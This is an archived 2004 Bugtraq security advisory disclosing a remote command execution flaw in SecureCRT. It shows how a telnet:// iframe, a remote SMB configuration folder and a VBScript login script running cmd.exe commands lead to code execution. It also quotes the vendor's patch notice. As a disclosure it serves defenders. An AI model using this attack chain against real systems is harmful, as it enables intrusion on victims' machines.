SecureCRT - Remote Command Execution

From: Brett Moore (brett.moore_at_security-assessment.com)
Date: 11/23/04

  • Next message: Mandrake Linux Security Team: "MDKSA-2004:138 - Updated XFree86 packages fix libXpm vulnerabilities"
    To: "Bugtraq@Securityfocus. Com" <bugtraq@securityfocus.com>
    Date: Tue, 23 Nov 2004 13:33:21 +1300
    
    

    ========================================================================
    = SecureCRT - Remote Command Execution
    =
    = Vendor Update:
    = http://www.vandyke.com/download/securecrt/index.html
    =
    = Affected Software:
    = SecureCRT V4.1, V4.0 (and probably lower)
    =
    = Public disclosure on November 23, 2004
    ========================================================================

    == Overview ==

    In this time of responsible vulnerability disclosure, it's a little
    disturbing when a vendor acts on disclosed information but gives no
    recognition or even notification that an update has been created due to
    the information passed to them.

    This advisory is a little late, the update was posted to the vendor
    website last month. The only reason I know this, is because I asked and
    received a response.
    ------------------------------------------------------------------------

    Brett,

    SecureCRT version 4.1.9 was released on Oct. 26, and is
    available for public download at the following location:

        http://www.vandyke.com/download/securecrt/index.html

    My apologies for not sending a special notice to you upon
    release. It was something that slipped off my radar.

    If you have any questions, please let us know.

    Thanks,
    Jake Devenport

    ------------------------------------------------------------------------

    But enough of that, we know the game and still choose to play.

    SecureCRT installs a URL PROTOCOL handler into the registry, as
    "C:\Program Files\SecureCRT\SecureCRT.EXE" %1

    This allows a user to click on a telnet:// link and have it opened from
    within their web browser.

    This 'telnet execution' can be automated through an html page such as
    <iframe src="telnet://192.168.0.1:25">

    SecureCRT will accept a command line option (/F) to specify the directory
    to use as the configuration folder. It is possible by crafting a special
    URL to specify this directory through the html page. An attacker can
    specify a directory accessible through unprotected SMB share, therefore
    allowing them to control the configuration of secureCRT.

    SecureCRT allows for 'scripting' using script languages such as vbscript
    and has the ability to create a logon script. An attacker can therefore
    create a script to execute commands and have these commands executed on
    the targets computer.

    == Exploitation ==

    There appears to be some filtering around the use of \ in the url->command
    line parsing, that appeared to prevent the specification of an SMB share
    to use for the configuration. This can be easily bypassed and leads to the
    loading of a configuration file from a remote site.

    The configuration file contains an entry that specifies the login script
    to run which can be set a file on the the remote share;

    S:"Script Filename"=\\ipofshare\share\folder\scriptname

    And the login script can then contain scripting such as;

    # $language = "VBScript"
    # $interface = "1.0"

    Sub Main
      dim wshShell, boolErr, strErrDesc
      Set wshShell = CreateObject("WScript.Shell")
      run = wshShell.Run ("cmd.exe /c dir >c:\shell.txt",0,True)
    End Sub

    == Solutions ==

    - Install the vendor supplied patch.

    == Credit ==

    Discovered and advised to vandyke.com August 24, 2004 by Brett Moore of
    Security-Assessment.com

    == About Security-Assessment.com ==

    Security-Assessment.com is a leader in intrusion testing and security
    code review, and leads the world with SA-ISO, online ISO17799 compliance
    management solution. Security-Assessment.com is committed to security
    research and development, and its team have previously identified a
    number of vulnerabilities in public and private software vendors products.

    ######################################################################
    CONFIDENTIALITY NOTICE:

    This message and any attachment(s) are confidential and proprietary.
    They may also be privileged or otherwise protected from disclosure. If
    you are not the intended recipient, advise the sender and delete this
    message and any attachment from your system. If you are not the
    intended recipient, you are not authorised to use or copy this message
    or attachment or disclose the contents to any other person. Views
    expressed are not necessarily endorsed by Security-Assessment.com
    Limited. Please note that this communication does not designate an
    information system for the purposes of the New Zealand Electronic
    Transactions Act 2003.
    ######################################################################


  • Next message: Mandrake Linux Security Team: "MDKSA-2004:138 - Updated XFree86 packages fix libXpm vulnerabilities"